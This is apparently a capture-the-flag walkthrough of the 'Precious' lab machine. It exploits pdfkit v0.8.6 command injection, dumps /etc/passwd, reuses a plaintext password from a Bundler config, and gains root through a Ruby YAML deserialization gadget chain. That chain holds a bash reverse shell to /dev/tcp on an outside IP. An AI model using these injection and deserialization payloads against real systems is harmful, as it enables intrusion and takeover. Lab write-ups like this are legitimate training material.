Precious
Attempting to exploit wkhtmltopdf
Finding wkhtmltopdf
Exploits
- https://www.virtuesecurity.com/kb/wkhtmltopdf-file-inclusion-vulnerability-2/ SSRF LFI
That actually might be a mislead because I spent 15 minutes trying to get it to LFI or SSRF but I was unsuccessful
exiftool
exiftool exploit.pdf
ExifTool Version Number : 12.16
File Name : exploit.pdf
Directory : .
File Size : 11 KiB
File Modification Date/Time : 2023:02:27 16:58:36-06:00
File Access Date/Time : 2023:02:27 16:58:36-06:00
File Inode Change Date/Time : 2023:02:27 16:58:36-06:00
File Permissions : rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 1
Creator : Generated by pdfkit v0.8.6
Finding pdfkit v0.8.6
nmap
pdfkit
Finding pdfkit
Downloading and scanning the pdf
Exploiting pdfkit
- https://github.com/shamo0/PDFkit-CMD-Injection
- https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795 Explains better
whoami
Request URL: http://10.10.14.92/?name=%20`whoami'
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-
data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-
network:x:101:102:systemd Network
Management,,,:/run/systemd:/usr/sbin/nologin systemd-
resolve:x:102:103:systemd
Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
henry:x:1000:1000:henry,,,:/home/henry:/bin/bash systemd-
timesync:x:999:999:systemd Time
Synchronization:/:/usr/sbin/nologin systemd-
coredump:x:998:998:systemd Core
Dumper:/:/usr/sbin/nologin
ruby:x:1001:1001::/home/ruby:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
We have RCE!
LinEnum
Foothold
Reverse Shell
Using a base64 encoded shell I was able to get tty access on user: ruby
User Henry Escalation
Finding the ~/.bundle/config really was just lazy sleuthing. I ran LinEnum.sh but it didn't pop out to me so I resorted back to browsing around
in the file is henry's password! Q3c1AqGHtoI0aXAYFH
Root Escalation
So henry has sudo access to run this file in the /opt directory
Here is what that file looks like:
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'
# TODO: update versions automatically
def update_gems()
end
def list_from_file
YAML.load(File.read("dependencies.yml"))
end
def list_local_gems
Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end
gems_file = list_from_file
gems_local = list_local_gems
gems_file.each do |file_name, file_version|
gems_local.each do |local_name, local_version|
if(file_name == local_name)
if(file_version != local_version)
puts "Installed version differs from the one specified in file: " + local_name
else
puts "Installed version is equals to the one specified in file: " + local_name
end
end
end
end
This Ruby script compares the list of installed gems on the system with the dependencies specified in a YAML file called dependencies.yml. It loads the contents of the YAML file using the YAML.load() method, and then lists the locally installed gems using the Gem::Specification module.
The script then loops through each dependency specified in the YAML file, and for each dependency, it checks if there is a corresponding installed gem with the same name. If a corresponding gem is found, the script compares the versions of the gem specified in the YAML file with the installed gem's version. If the versions differ, the script outputs a message indicating that the installed version differs from the one specified in the file. If the versions are the same, the script outputs a message indicating that the installed version is equal to the one specified in the file.
The update_gems() method is currently empty and marked as a TODO, indicating that it may be intended to automatically update gem versions, but this functionality has not yet been implemented. Overall, the script seems to be a simple tool to help ensure that the correct versions of the required gems are installed on the system.
Exploiting RCE through YAML Deserialization
I find some interesting information about YAML deserialization
- https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/
- https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471/
- https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/ Used example
So I believe we have a way to execute the
update-dependencies.rbscript and obtain a root shell
I create ~/dependencies.yml with this content:
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "bash -c 'bash -i >& /dev/tcp/10.10.14.92/9000 0>&1'"
method_id: :resolve
Execute update-dependencies.rb
Flags
User Flag
46b75bc5ff26307936687ed60967bd9eRoot Flag
f12dc32af9468ad774222a52228ac553